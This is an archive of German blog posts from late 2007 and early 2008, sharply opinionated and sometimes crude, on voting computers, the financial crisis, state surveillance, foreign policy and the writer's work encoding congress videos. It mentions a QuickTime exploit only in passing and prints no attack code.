Jetzt tut er so, als wolle der CCC während der Wahl den Chip austauschen. Das ist selbstverständlich eine dreiste Lüge. Erstmal: der CCC will überhaupt gar keinen Chip austauschen. Der CCC weist darauf hin, dass ein Wahlfälscher den Chip austauschen könnte. Die Wahl wird von Leuten durchgeführt, bei denen ich keinerlei Grund habe, denen Vertrauen entgegen zu bringen. Der Wahlleiter selbst könnte die Manipulation vornehmen. Oder der Bürgermeister könnte für seine Wiederwahl ein paar Mäuse aus dem Staatssäckel in Form eines Beratervertrages an jemanden springen lassen, der ihm das dann in einer Nacht- und Nebelaktion macht. Eine Demokratie versteht dieses Problem und trägt ihm Rechnung, indem gewährleistet ist, dass Bürger die Wahl und die Auszählung überwachen dürfen. Das geht bei Wahlcomputern nicht mehr. Dieses Detail hat offenbar der Herr Bieber nicht verstanden. Aber kein Problem, dafür gibt es ja den CCC und mich, damit wir sowas aufklären können.
Aber wartet, das ist noch nicht alles. Als nächstes versucht der, dem CCC niedere Motive nachzuweisen:
Zudem hätte der Erfolg des Verbotsantrags zu einem Gesichtsverlust des Wahlleiters geführt. Er hat ein Interesse daran, dass die Wahl ordnungsgemäß stattfindet.
Aha! Wir machen das nur, weil wir den Wahlleiter nicht leiden können!1!! Nee, klar. Aber der Klopper schlechthin kommt noch:
Aber Papierwahlen sind viel einfacher zu fälschen. Das konnte man gut bei der Wahl des Hamburger SPD-Spitzenkandidaten sehen. Da verschwinden einfach Säckeweise Wahlzettel. Warum gerade der Technologie mehr Manipulationsmöglichkeiten unterstellt werden als Menschen, kann ich nicht verstehen.
AAAAAAAARGH! Das ist doch der PUNKT, Mann! Weil wir Wahlzettel hatten, konnten wir sehen, dass da Säckeweise Wahlzettel verschwunden sind! Bei Wahlcomputern kann man das eben NICHT mehr sehen!
Das Wahlrecht wird immer komplizierter, beispielsweise durch Panaschieren und Kumulieren. Und es wird immer schwieriger, Wahlhelfer zu rekrutieren. Da sind Wahlcomputer eine gute Möglichkeit, die Auszählung zu vereinfachen und Kosten zu sparen.
Da ist der gute Mann von der Realität überholt worden. Zusammengefaßt: KEINE EINZIGE der Behauptungen, die dieser Mann da trifft, hat mit der Realität etwas zu tun. Erschütternd, dass die Süddeutsche solchen Leuten noch ein Forum bietet.
Update: Hier ist die Homepage. Gebt euch das mal. Unglaublich.
(als Hrsg./mit Claus Leggewie): Interaktivität. Ein transdisziplinärer Schlüsselbegriff. Frankfurt/New York, 2004.
(als Hrsg./mit SPoKK) Jugend, Medien Popkultur. Ein Sammelalbum. Berlin, 2003.
Was hat die bloß geritten, diesen Typen zu Wahlcomputern zu befragen?! Und studiert hat er Politikwissenschaft und Germanistik an der FU Berlin. Keine weiteren Fragen. So jemand ist ja praktisch prädestiniert, sich zur Manipulationssicherheit von Wahlcomputern zu äußern. Ein echter Techniker, der Mann.

Wed Jan 23 2008

[l] Maskierte Terroristen haben die Grenzmauer zwischen Ägypten und dem Gazastreifen gesprengt. Interessant ist, was dann geschah: die Ägypter haben nichts gemacht. Die Palästinenser sind in Scharen nach Ägypten gegangen und haben dort Lebensmittel, Medikamente und andere knappe Güter gekauft. Manchmal sind die maskierten Terroristen eben doch auf der Seite der Menschlichkeit.
[l] Ich glaube ja übrigens auch, dass die Sparkassen da fett betroffen sind bei den Junkhypotheken. Anders ist ja dieser Hypotheken-Weiterverkauf gar nicht erklärbar, der da seit November (da lief es in Plusminus, die Tage gab es dazu eine Sendung namens "Und plötzlich ist das Haus weg") im Fernsehen läuft. Ich dachte ja, ich hätte dazu schon was geblogt, aber offenbar nicht. Also schaut mal, ob ihr diese Sendung noch mal wo seht, das macht außerordentlich wütend.
Die Masche, kurz zusammengefaßt: Die Sparkassen verscheuern Hypotheken (und zwar auch solche, bei denen alle bisherigen Raten voll und rechtzeitig gezahlt worden sind) an eine Heuschrecke namens Lone Star, die dann das Haus zwangsversteigert. Als Twist kommt dazu, dass es im Deutschen Recht einen Unterschied zwischen der Grundschuld und der Hypothek gibt, so dass die da auch noch die volle Summe vollstrecken können, selbst wenn schon 90% abgezahlt war.
Als Salz in der Wunde kommt dann noch dazu, dass die Hypotheken weit unter Wert (die Sendung schätzt zu 30% des Nennwerts) verscheuert werden, und die Sparkasse dann diverse gute Hypotheken "untermischen", um der Heuschrecke einen besseren Deal anbieten zu können. In einem Fall sagt die Sparkasse sogar, die eine Hypothek sei nur "versehentlich" an Lone Star verkauft worden.
Man kann sich dann wohl theoretisch die Kohle zivilrechtlich von der Bank wiederzuholen versuchen, aber in der Praxis ist das Haus weg und man ist erst mal obdachlos.
Also ich mache ja sowieso keine Geschäfte mit einer Sparkasse, seit ich als Schüler mal ein Konto bei denen hatte, das eine Weile mit ein paar DM im Plus ruhen ließ, und als ich dann mal gucken wollte nach ein paar Jahren, sagte mir der Geldautomat, das Konto existiere nicht. In der Bank meinte man dann, dieses Konto gäbe es nicht, konnten mir aber auch nicht sagen, wo ich dann die Kundenkarte her habe. Es ging zwar nur um 5 DM oder so, aber wer einmal sowas mit mir macht, dem kann ich nie wieder vertrauen, ist doch klar. Und wenn ich sowas lese, dann bin ich froh, dabei stets geblieben zu sein.
Update: Mir hat jemand eine Stellungnahme der Sparkassen gemailt, wo sie behaupten, dass entgegen der Darstellungen in dem Film es doch bei allen betroffenen Hypotheken Zahlungsschwierigkeiten gegeben habe.
Update: Gibt es auch online, beim WDR gibt es ein bisschen Text.
Update: Die Sparkassen haben jetzt eine einstweilige Verfügung gegen die WDR-Doku gekriegt. Nun wird so eine einstweilige Verfügung ohne Anhörung des Opfers erlassen, insofern überzeugt mich das noch nicht per se. Der WDR sagt dann auch, die veröffentlichten Fakten seien belegbar und sie stünden dazu.
[l] Im Moment herrscht an den Weltmärkten Armageddon. Asien ist auch eingebrochen, Indien und Indonesien fast 10%, der Rest um die 6%. Die Börsen in Indien und Südkorea haben den Handel ausgesetzt. Die EU-Märkte sind wieder deutlich runtergegangen und haben sich dann mysteriös gefangen, als ob es bei uns auch ein Plunge Protection Team gibt. Gibt es ja vermutlich auch. Der Fed hat eine Notfall-Leizsinssenkung um 0,75% durchgezogen. Und hieß es noch, Bank of America hat 95% weniger Profit gemacht im 4. Quartal, Wachovia sogar 98%, beide schieben es auf die Hypothekenkrise.
Oh, und falls jemand noch Aktien hält, und sich gerade denkt, hey, die verkaufe ich am besten mal schnell, bevor das noch schlimmer wird: hoffentlich seid ihr keine DAB-Kunden, denn die haben ausgerechnet am Tag nach dem Mega-Absturz Server-Wartungsarbeiten. Ich vermute mal, dass die da ihre Eigensicherung wichtiger finden gerade als das Abwickeln der ganzen Kleckerorders der Kunden.

Tue Jan 22 2008

[l] Heute hat der DAX Götterdämmerung gemacht. Es gibt dazu schöne Bilder, aber ich habe von einem Blogeintrag abgesehen, bis ich das Zitat gefunden habe, dass den Nagel köpft:
boerse.ARD.de: Der Dax ist heute bis auf 6.762 Punkte gesackt. Inzwischen sehen wir eine leichte Gegenbewegung. War es das schon mit den Kursverlusten?
Müller: Das glaube ich nicht. Die Talfahrt ist noch längst nicht beendet. Wir sehen im Moment keine Käufe, selbst die institutionellen Investoren greifen nicht zu. Die leichte Gegenbewegung rührt meiner Meinung nach fast ausschließlich von den so genannten Leerverkäufern, die heute morgen short gegangen sind, und sich nun eindecken müssen bzw. Gewinne mitnehmen.
AU WEIA. (Danke, Björn)

Sun Jan 20 2008

[l] Was machen wir eigentlich, wenn unseren Politikern die Bedrohungen ausgehen? Die gesamte Innenpolitik ist im Moment nicht von den tatsächlichen Problemen dominiert (wie z.B. die Renten-Verarschung, dass Leuten ihre Renter auf die Sozialleistungen im Alter angerechnet werden und die ganzen Armen damit keinerlei Gegenwert kriegen, wenn sie jetzt in die Rentenfonds einzahlen), sondern von aufgebauschten Bedrohungen. U.a. die NPD. Natürlich auch die Araber, die uns alle zum Islam konvertieren oder in die Luft bomben wollen. Aber die NPD ist eine der Drohungen, mit denen sie in jedem Wahlkampf kommen. Nun besteht die ja offenbar fast nur aus Idioten und V-Männern, die NPD, insofern ist die Frage schon gerechtfertigt, wie die Politiker sich die NPD als Bedrohung für die Zukunft erhalten wollen. Diese Tage gab es da einen wunderbaren Einblick in die Strategie: Sie wollten einen Ex-"Republikaner" zum Leiter der Intensivtäterabteilung der Berliner Staatsanwaltschaft machen. Das kann ja nur dem Zweck gedient haben, den Nazis beim Rekrutieren passenden Nachwuchs zuzustecken.
Es gab eine Zeit, da stand Rolf von Niewitecki für Parolen wie diese: "Der Ausländeranteil ist so schnell wie möglich zu verringern", hieß es im Programm der Partei "Die Republikaner". Das war 1990, als von Niewitecki stellvertretender Landesvorsitzender der rechtsextremen Partei in Berlin war. Womöglich kann der Mann sein Politprogramm bald in professionelle Arbeit umsetzen. Staatsanwalt von Niewitecki soll in die Abteilung für Intensivtäter wechseln.
Sehr schön, liebe taz, besser kann man das gar nicht sagen. Falls ihr euch nicht mehr erinnert, weshalb der letzte Chef der Intensivtäterdatei gehen mußte, bringt die taz das auch noch gleich:
So richtig kann in der Hauptstadt niemand verstehen, warum ein Rep in eine Abteilung wechseln soll, als deren internes Ziel es gilt, ausländische Straftäter "außer Landes zu schaffen oder sonst 'aus dem Verkehr zu ziehen' ". So hatte es der Leiter der Berliner Intensivtätereinheit kürzlich geäußert. Berlins Justizsenatorin Gisela von der Aue (SPD) hat den Vorgang gestoppt und die Behördenspitze zu sich einbestellt.
Na, bimmelts? Das ist gewollt so. Denn die Republikaner und NPD sprechen ja mit ihrem Ausländergehetze bloß aus, was die "Volksparteien" in ihren Fokusgruppen schön längst als des Volkes Wille begriffen haben und auch zum Programm gemacht haben. Ausgrenzen statt Integrieren. Rausschmeißen statt Zusammenarbeiten.
Allein: es wird nichts.

Sun Jan 13 2008

[l] Airstrip One baut den Unterdrückungsstaat-Vorsprung weiter aus: "British Prisoners 'to be chipped like dogs'". Und es läuft genau so ab, wie die Sci-Fi Geschichten es voraus gesagt haben:
Ministers are planning to implant "machine-readable" microchips under the skin of thousands of offenders as part of an expansion of the electronic tagging scheme that would create more space in British jails.
Das ist alles ganz, ganz, ganz furchtbar.
The tags, labelled "spychips" by privacy campaigners, are already used around the world to keep track of dogs, cats, cattle and airport luggage
Auf dem Niveau bewegt sich unsere "Zivilisation" heute. Und wie begründen sie das? Nicht mit Mördern, weil da fordert das Volk dann lieber die Todesstrafe. Mit Kinderschändern! Immer die selbe Masche.
"If we are prepared to track cars, why don't we track people?" Mr Jones said. "You could put surgical chips into those of the most dangerous sex offenders who are willing to be controlled."
Besonders verstörend ist dieser Teil, den ich so verstehe, dass die Amerikaner das schon machen:
The internal tags also have a use in maintaining order within prisons. In the United States, they are used to track the movement of gang members within jails.
Aber nichts ist so furchtbar, dass es nicht noch schlimmer gemacht werden könnte. Achtung, festhalten:
One company plans deeper implants that could vibrate, electroshock the implantee, broadcast a message, or serve as a microphone to transmit conversations. "Some folks might foolishly discount all of these downsides and futuristic nightmares since the tagging is proposed for criminals like rapists and murderers," Ms McIntyre said. "The rest of us could be next."
Na? Wedlock, anyone? Ich rechne ja an sich täglich damit, dass hier mal ein Terminator aus der Zukunft auftaucht. (Danke, Hans)

Sat Jan 12 2008

[l] Ich habe ja schon mehrfach geschrieben, dass die US-Wahlen eine Farce sind und danach alles genau so furchtbar bleibt wie es jetzt ist, wenn nicht noch furchtbarer. Jetzt gibt es einen schönen Artikel auf GlobalResearch.ca über die Präsidentschaftskandidaten, und, für mich die überraschenste Neuigkeit: Hinter Obama steht Zbigniew Brzezinski! Das ist eine der eisernen Strategen der Demokraten, deren Analog zu Kissinger, ein kalter Krieger, wie er im Buche steht. Vor allem aber ein sehr schlauer Mann, dessen Ansichten zur Welt immer interessant und lesenswert sind. Lest euch mal seinen Wikipedia-Artikel durch, was der alles gemacht hat in seinem Leben. Der Mann war immer schon ein Kriegstreiber und hat auch das vereinbarte gegenseitige politische in-Ruhe-lassen verletzt.

Thu Jan 10 2008

[l] Kracher des Tages: "FBI Wiretaps Dropped Due to Unpaid Bills". Das FBI ist echt genau so, wie man sich das immer vorstellt. Telcos haben Abhöraktionen des FBI abgebrochen, als die Kohle nicht kam. Eine Agentin hat sich mit 25.000 Dollar einen schönen Abend gemacht.
"We also found that late payments have resulted in telecommunications carriers actually disconnecting phone lines established to deliver surveillance results to the FBI, resulting in lost evidence," according to the audit by Inspector General Glenn A. Fine.
Und, wie könnte es auch anders sein, das ist nur die Spitze des Eisbergs. Der Großteil des Reports ist zensiert, weil das "too sensitive" sei nach Ansicht des FBI. (Danke, Jan)

Sun Jan 6 2008

[l] Findet das eigentlich noch jemand erstaunlich, das sie jetzt die beschlagnahmten Festplatten von Firmen auf Kinderpornos untersuchen lassen wollen? Ich hab ja keine Ahnung von Juristerei, aber der Besitz von Kinderpornos ist strafbar. Wenn ich als Firma also eine Platte untersuche, und da Kinderpornos finde, habe ich mich strafbar gemacht, oder nicht?
Mal ganz abgesehen davon: da sind private Daten drauf. Das können die doch nicht einfach so irgendwelchen Firmen zum Durchgucken geben?!

Tue Jan 1 2008

[l] Nachschlag zu den Videos: ich habe die jetzt fast alle konvertiert, zwei-drei müssen noch mal gemacht werden. Dann laufe ich mit der Platte mit den Videos in den Club, und dann packen wir das in den Torrent. So lange könnt ihr euch ja mal mit meinen Folien zum Video-Encoding amüsieren. Kurze Erklärung zu dem Gaffa-Bild: da hatte jemand das Stromkabel der Kamera rausgezogen, um sein Handy zu laden. Daraufhin haben wir das mit Gaffer-Tape fixiert. Das Keynote-Sync-Problem war folgendes: während der Keynote schaltet die Haustechnik für ne Minute Audio komplett ab. Als es wieder kommt, sind fette Interferenzen drauf. Das erste, was wir gehört haben, war Tims Worte "Ich höre gerade, dass Streaming auch schon funktioniert", und während er Streaming und funktioniert sagte, gibt es einen krassen BZZZZT-Sound über dem Signal :-)

Mon Dec 31 2007

[l] Afghanistan hat UN-Mitarbeiter rausgeschmissen, weil sie mit den Taliban verhandelt haben. Wer jetzt denkt, hey, das ist die UNO, genau dafür sind die Leute da hingeschickt worden, der irrt offensichtlich. :-)
Aber es gibt da noch einen Kontext, in dem das interessant ist: MI6-Agenten haben mit den Taliban verhandelt.
An intelligence source said: "The SIS officers were understood to have sought peace directly with the Taliban with them coming across as some sort of armed militia. The British would also provide 'mentoring' for the Taliban."
Au weia. So schlecht geht es denen in Afghanistan, dass sie schon mit den Taliban Friedensverhandlungen führen müssen.
MI6's meetings with the Taliban took place up to half a dozen times at houses on the outskirts of Lashkah Gah and in villages in the Upper Gereshk valley, to the north-east of Helmand's main town.
Soso, UN-Mitarbeiter waren das also, ja? Nee, klar.
Meine Vermutung: es geht darum, dass die Taliban in den zurück eroberten Gebieten nicht wieder aus fundamental-religiösen Gründen den Drogenanbau verbieten. Womit sollen die CIA (und offenbar der MI6) sonst ihre schwarzen Projekte finanzieren? Aber ich muss ja sagen: das hat Stil, sich bei solchen konspirativen Gesprächen von der Armee abriegen und bewachen zu lassen. Ich verweise auch auf folgenden Absatz:
They are both Afghan experts who have been working in the country since the 1980s.
Ach, Geheimdienstler in Afghanistan seit den 80ies. Was die da wohl gemacht haben werden?

Sat Dec 29 2007

[l] Es gab da nach langem, zähen Kämpfen einen ersten Durchbruch und wir haben jetzt einen funktionierenden Workflow, um Videos in Matroska und MP4-Containern zu veröffentlichen. Video-Codec ist in beiden Fällen H.264, mit vielen B-Frames (so macht man das bei relativ statischen Szenen wie Vorträgen, aber das macht es inkompatibel zu den übelsten und schlechtesten Schrott-Implementationen der Welt, wie QuickTime und den Cheapo-Hardware-Playern aus dem Hause Apple). In der Matroska-Version ist Audio ein 64 kbit Vorbis, in den MP4-Containern ist Audio ein 64 kbit AAC Stream. In beiden Fällen ist das Audio Mono, so kommt das bei mir an.
Die MP4-Version hat den Vorteil, auf der größten Player-Basis der Welt zu spielen: dem aktuellen Flash-Browserplugin. Ich bin mir sicher, bald wird jemand eine Webseite mit den Videos als Flash-Embeds machen. Mplayer kann das natürlich auch sauber abspielen, ist ja klar.
Die Matroska-Version habe ich so gemacht, weil Vorbis der coolste Audiocodec ist, und Matroska als Containerformat die Warez-Szene im Sturm nimmt, und die Warez-Leute sind da pingelig. Wenn das für die gut genug ist, hat das Zukunft. So sind auch RAR, AVI, MP3 und DivX groß geworden.
Eigentlich hätte es einen dicken FTP-Server auf dem Congress geben sollen für sowas, aber das hat wohl nicht stattgefunden, also haben wir die Videos einfach auf einen der FTP-Server hochgeladen, und sie verteilen sich gerade schon schön. Hier ist das CCC-Wiki, wenn ihr einen Mirror macht, könnt ihr euch da ja auch eintragen. Das sind die Videos von Tag 1, die heute fertig wurden. Im Moment läuft ein fetten Encode-Job, morgen gibt es neue Videos.
Da das dieses Jahr alles so ruck-zuck gehen mußte mit den Videos (haben wir uns nach den bösen Verzögerungen der letzten Jahre selber auferlegt), hat das Qualitätsmanagement ein bißchen leiden müssen. Wenn irgendwo was kaputt ist, und wir das übersehen haben, dann meldet euch. Wir können das in manchen Fällen noch retten. In anderen sind die Videos auch echt im Arsch, und dann müssen die armen FEM-Jungs das manuell von einem der Tapes popeln, die in den Kameras selber liefen. Es ist ausdrücklich geplant, dass das auch noch während des Congresses stattfindet. Mal gucken, wie es wird.
FEM und ich stehen übrigens ausdrücklich nicht in Konkurrenz, die machen Capturing, ich grabbe das nur zur Sicherheit auch noch mal von deren Signal ab und encode das. Ihre Captures sind mit professionellerer Technik aufgenommen und sehen vermutlich besser aus, aber haben wir halt beide mit technischen Rahmenbedingungen wie Matschsignal wegen HF-Signalen auf 100m-Kabel zu kämpfen, und die Beleuchtung ist in Saal 2 und 3 auch eher flau und der Kontrast schlecht, und dann gibt es da noch ein Kabel mit einem Wackelkontakt… wir tun halt, was wir können.
Da es diesmal so toll früh Videos gibt, würde ich mich freuen, wenn ihr euch da auch mal drüber freuen könnt, denn das ist ein echt übler Streß und Aufwand, das so fix hinzukriegen, und wenn ihr dem Club gegenüber zum Ausdruck bringt, dass euch das wichtig ist, dass das so schön läuft, dann ist vielleicht nächstes Mal auch Budget für anständige Leihkameras und kürzere Signalwege da. Oh und die FEM-Leute und ich nehmen natürlich auch gerne Lob und spontane Freudenausbrüche entgegen.
Oh, und den verärgerten Apple-Usern sei gesagt, dass FEM auch MP4-Encodings macht, die dann allerdings Ipod-fähig sein sollen, und vermutlich auch auf Nicht-Ipods besser aussehen (weil deren Capture-Equipment wie gesagt besser ist als meines).

Fri Dec 28 2007

[l] Also die Situation bei den Videos ist ein Desaster. Von den Videos, wo ich eine brauchbare Eingabe hatte, habe ich AVIs gemacht, habe den Audio-Sync korrigiert, und die spielen auch sauber ab. Leider sollen da nun jetzt auch noch Vorspänne davor, und ein Abspann dahinter. Die kamen als MP4-Datei ohne Sound, da mußte ich also Stille in der richtigen Samplerate erzeugen, encoden, und dazu tun. Mein ursprüngliches Modell sah vor, die Fetzen mit mencoder -ovc copy -oac copy hintereinander zu pasten. Das funktioniert auch, abgesehen von der Kleinigkeit, dass mencoder plötzlich meint, beim Stream Copy Modus Frames droppen zu müssen. Das trifft natürlich zunächst einmal Frames, die von anderen Frames referenziert werden, so funktioniert Videokompression, und damit gibt es üble Folgefehler, der Decoder heult rum und das Video sieht Scheiße aus. Wer das verbrochen hat, gehört direkt an die Wand gestellt.
Also habe ich mir gedacht, hey, kein Problem, MP4Box kann ja auch aneinanderhängen. Ich habe also MP4-Dateien aus Intro, Video und Outro gemacht, und … MP4Box raucht ab, mit einem glibc-Speicherkorruptions-Stackdump, natürlich ein nicht spielbares File hinterlassend.
Gut, dann releasen wir das halt als Matroska. mkvmerge kann auch Tracks hintereinander hängen, genau was man will. Leider mochte er plötzlich meine Intro und Outro nicht lesen, und Zwischen-Hacks der Konvertierung nach Matroska schlugen auch fehl, weil mkvmerge die .AAC-Dateien nicht lesen mochte. Nach dem Encapsulaten in MP4 las er sie dann, aber das Zielvideo hatte kaputtes Audio-Sync. ARGH!
Ich habe jetzt mencoder zerhackt, damit er AVI-Dateien erzeugt, die Vor- und Abspann haben, und richtiges Sync, aber der Sync geht beim Konvertieren nach MP4 oder Matroska wieder verloren.
Inzwischen will ich gar nicht mehr wissen, warum das jetzt alles nicht tut. Ich bin kurz davor, einfach die AVIs zu releasen.

Tue Dec 25 2007

[l] Lustige Story über den Präsidenten von Ecuador, mit dem Greg Palast ein Interview geführt hat. Der erste Indio, der da Präsident ist, und der erzählt in dem Interview völlig überraschend, dass sein Vater in den 60ies Drogen in die USA geschmuggelt hat, erwischt wurde, im Knast saß, abgeschoben wurde, und dann Selbstmord begang. Der Präsident selber hat übrigens in Wirtschaftswissenschaften promoviert und an einer US-Uni gelehrt, ist also kein kleiner Spinner. Palast berichtet in dem Bericht, was der Mann da schon gemacht hat, und das macht ein bißchen Hoffnung.

Wed Dec 12 2007

[l] Oh guckt mal, das ist ja GANZ toll. Die bekloppten Europäer haben sich mal wieder von den Amis komplett verarschen lassen. Die EZB kauft den Amis jetzt 20 Milliarden Dollar ab, "um einen Dollar-Engpass in Europa zu verhindern". Man fragt sich ja immer, wer eigentlich noch so grenzdebil ist, den Amis ihr Spielgeld abzukaufen. Jetzt wissen wir es. Wir.
Update: Nur um mal zu verdeutlichen, wie hanebüchen die Ausrede ist, sie würden da eine Dollarknappheit in Europa bekämpfen: guckt mal den ersten Absatz dieses Financial Times Artikels an.
Many dollar holders, including central banks and sovereign wealth funds as well as private investors, clearly want to diversify into other currencies. Since foreign dollar holdings total at least $20,000bn, even a modest realisation of these desires could produce a free fall of the US currency and huge disruptions to markets and the world economy.
Auf Deutsch: alle sitzen auf riesigen Haufen von Dollars und wollen sie gerne loswerden, können aber nicht, weil dann der Dollar komplett wegbricht und sie für den Rest ihres dicken Dollarberges nichts mehr kriegen. Daher versuchen gerade alle ihre Dollars in kleinen unauffälligen Häppchen loszuwerden. Das klappt, weil sich immer wieder Doofe finden, die das lieber auch noch kaufen, um den Dollar-Wertverlust auszugleichen, und damit den Wert ihrer immensen Dollareinlagen konstant zu halten. U.a. eben die EZB. Seit die Währungen der Länder nicht mehr mit Gold gedeckt sind, haben die meisten Länder massive Werte in Dollar-denominierten Investments, meistens US-Anleihen "investiert". Wenn der Dollar wegbricht, brechen auch alle diese Investments weg. Deutschland hat das auch so gemacht. Die lagern sogar in den USA, in New York.
[l] Die Schweizer machen es vor: Schweizer Parlament schmeißt untragbaren Justizminister raus. Es handelt sich um den Blocher, der demonstrativ einen Schulterschluß mit Schäuble gemacht hatte. Höchste Zeit, dass wir auch mal unser Kabinett auswechseln. Wenn man da die untragbaren Minister und Kanzler entfernt, bleibt ja eh nichts übrig.

Tue Dec 11 2007

[l] Boah kann diese beschissene Content-Mafia jetzt mal langsam sterben, bevor sie uns das Internet ganz kaputt gemacht haben?

Mon Dec 3 2007

[l] Tut mir leid, ich kann mich nicht beherrschen: Quicktime-Bug wird benutzt, um Windows-User zu infizieren.
Vorab: Bug ist Bug, Windows und OS X sind auf Intel, die Exploit-Technik ist identisch. In Metasploit gibt es für beide Plattformen fertigen Shellcode. Wen greifen die an? Windows!
Versetzt euch mal in Apple. Du hast eine ultra-schlechte Software namens Quicktime gehackt, über die seit Jahren immer wieder Rechner aufgemacht werden, ein einziges klaffendes Sicherheitsloch der Größe von Spanien. Jetzt kommt ein Hacker. Und der hackt nicht dich damit, sondern Windows. Kann man überhaupt klarer mitgeteilt bekommen, dass OS X als Plattform völlig wertlos ist? Apple gibt den Hackern einen Angriffsvektor in die Hand, für den es öffentlichen Shellcode gibt, und die Hacker machen lieber Windows auf. BWAHAHAHAHAHA

Thu Nov 29 2007

[l] Ebay hat offenbar ähnliche Beobachtungen wie ich über Apple-Kunden gemacht. Und sie haben ja völlig Recht! Wenn man eine Kundengruppe sucht, die sich freiwillig zu der Phisher-Nesselgrube Paypal nötigen läßt, um ein viel zu teures Plaste-Bomber-Phone zu kaufen, dann sind es Apple-Kunden.
Ich frage mich, wann die Scammer den Apple-User-sind-dämlich-Effekt nutzen und für Apple-Auktionen auf Ebay nur Zahlungen von Konten bei der Südnigerianischen Agrarbank annehmen, die aus bürokratischen Gründen 20 Kiloeuro Mindesteinlage brauchen.

Mon Nov 26 2007

[l] Hahahahaha, die Food-Mafia hat echt gar keine Schmerzen. Aktuelle Masche: Rindfleisch.Massenproduktion mit Wachstumshormonen und Kornfütterung im Stall emittiert 40% weniger Treibhausgase als Bio-Rindfleisch. Der Autor ist auch einer der "Treibhauseffekt-Skeptiker" und hat Teile der BSE-PR-Kampagne für die Rindfleischindustrie gemacht. Er hat auch ein Buch geschrieben, wo er u.a. behauptet, Bio-Fleisch sei gesundheitsgefährlich, weil ohne Antibiotika voll viele Bakterien darin sind.

Wed Nov 21 2007

[l] Die Unrechtsgesellschaft versinkt weiter in der Unmenschlichkeit: Berliner Arbeitsamt statuiert Exempel an Mann, der Zwangsarbeit verweigert:
Weil er einen Job ablehnte, wurden einem ALG-II-Empfänger in Berlin Arbeitslosengeld und Mietbeihilfe vollständig gestrichen. Das Jobcenter übernehme jedoch die Kosten für ein Obdachlosenasyl, wurde ihm gesagt.
Die ganze Situation erinnert mich an das Gefängnis-Experiment. Es steckt eben in den meisten von uns ein Monster, und wenn die sozialen Hürden wegfallen, die die Leute an dem Ausleben ihres inneren Monsters abhalten, dann tun sie das. Ich persönlich wünsche dieser Sachbearbeiterin ebenfalls die Obdachlosigkeit. Unfaßbar, dass solche Leute bei uns in so entscheidender Position arbeiten dürfen.
Besonders übel auch, dass das formaljuristisch legal ist, was die Frau da gemacht hat. Da sieht man eben mal, dass "legal" nicht ausreichend ist. Auch die Machtergreifung der Nazis war legal. (Danke, Lars)

Sun Nov 18 2007

[l] Mir fehlen ja gerade so ein bißchen die Worte, um den Schmiergeldkatalog zu kommentieren, mit wie viel Geld die Regierung pro Einzelfall die ISPs ruhigstellen will, wenn bei ihnen Kunden abgehört werden.
Gut, war an sich die ganze Zeit schon klar, die ISPs sind nicht gegen die Vorratsdatenspeicherung, weil das unmenschliche Nazi-Stasi-Securitate-Scheiße ist, sondern weil es Geld kostet und sie darauf sitzen zu bleiben fürchten. Insofern war klar, dass der Staat nur mit Geld anderer Leute (nämlich von uns, den abgehörten Steuerzahlern) winken muss, und schon knicken die ISPs ein.
Aber guckt euch diese Werte doch mal genauer an. Ich zahle für meine DSL-Flatrate weniger als der ISP bei meinem Abhören bekäme. Für ISPs existiert jetzt ein prima Anreiz, gezielt Kriminelle und Terroristen als Kunden zu werben, denn damit können sie deutlich mehr Profit machen als nur normalen Kunden.
Härter noch: die ISPs mit Duckmäusern und Mitläufern, gegen die nie Abhörmaßnahmen gemacht werden, bleiben auf den Kosten komplett sitzen. Das werden die sicher ungerecht finden. Und vielleicht gelegentlich den einen oder anderen Vielsauger-Kunden bei der Polizei anschwärzen, zwei Fliegen mit einer Klappe und so.
Tolles Land, in dem wir da wohnen, nicht wahr? Ich würde ja von mafiosen Methoden sprechen, aber heute im Fernsehen gab es einen prima Sketch von Volker Pispers, wo er zu Recht sagte, die katholische Kirche habe da die älteren Rechte.

Mon Nov 12 2007

[l] Mhh, heute kam PHP 5.2.5 raus. Das Release Announcement sagt:
Key enhancements in PHP 5.2.5 include:
- Upgraded PCRE to version 7.3
Und nun schauen wir mal auf diese Meldung von letzter Woche zum Thema Bugs in PCRE:
Betroffen sind die Versionen 6.x und 7.x, in der offiziellen Version 7.4 sind die Fehler behoben.
Es war ja bekannt, dass PHP eine Lachnummer ist, aber das finde ich jetzt doch ziemlich grob.
Update: Stellt sich raus, dass die Sicherheitslücken schon in PCRE 7.3 gefixt waren, dafür haben sie dort andere Dinge kaputt gemacht. PHP liefert also nicht unsichere, sondern nur kaputte Software aus.

Fri Nov 9 2007

[l] Polylog hat einen schönen Podcast-Beitrag über die Terror-BKA-Schnüffelaktion gegen Andrej und Anna, und da sieht man auch mal schön, wie der Fernseher gestört wird, weil das Handy spontan losfunkt. Ich hoffe ja, wenn sich für den Fall genügend viele Leute interessieren, dass das dann auch mal irgendwann ein Ende hat. Was für eine menschenunwürdige Scheiße, die unser Staat da abzieht. Und vor allem: mit unseren Steuergeldern! ICH zahle noch dafür, dass dieser Familie da das Leben zur Hölle gemacht wird. Und wenn das für Erwachsene schon traumatisierend ist, mag ich gar nicht darüber nachdenken, was das bei den Kindern für Furchen hinterläßt. Kinder verstehen zwar den Zusammenhang vielleicht noch nicht, aber spüren doch sehr genug, wenn der Vater mal für ein paar Wochen unerklärt weg ist (doh!) oder wenn die Eltern ständig in einer Atmosphäre der Furcht leben. Ein sehr empfehlenswerter Film dazu übrigens: Die Innere Sicherheit.

Sun Nov 4 2007

[l] Captain Obvious: Den USA brechen die Besucherzahlen weg. ACH NEE. Der Lacher dabei:
The number of foreign visitors to the United States has plummeted since the September 11, 2001 attacks on New York and Washington because foreigners don't feel welcome, tourism professionals said Thursday. […]
"Travelers around the world feel the US entry experience is among the world's worst," Freeman said, calling on the US government to work with the private sector to make visa acquisition more efficient, the entry process traveler-friendly, and to improve communication.
Das ist wirklich witzig, denn ich bin gerade dabei, mir ein US-Visum zu holen. Das letzte Mal bin ich da hin gegangen (zum Konsulat), habe ein paar Formulare ausgefüllt, ein paar Dollar gezahlt, habe in einem Automaten im Gebäude ein passendes Passfoto gemacht, und sie haben mir das Visum direkt vor Ort ausgedruckt und in den Reisepass geklebt.
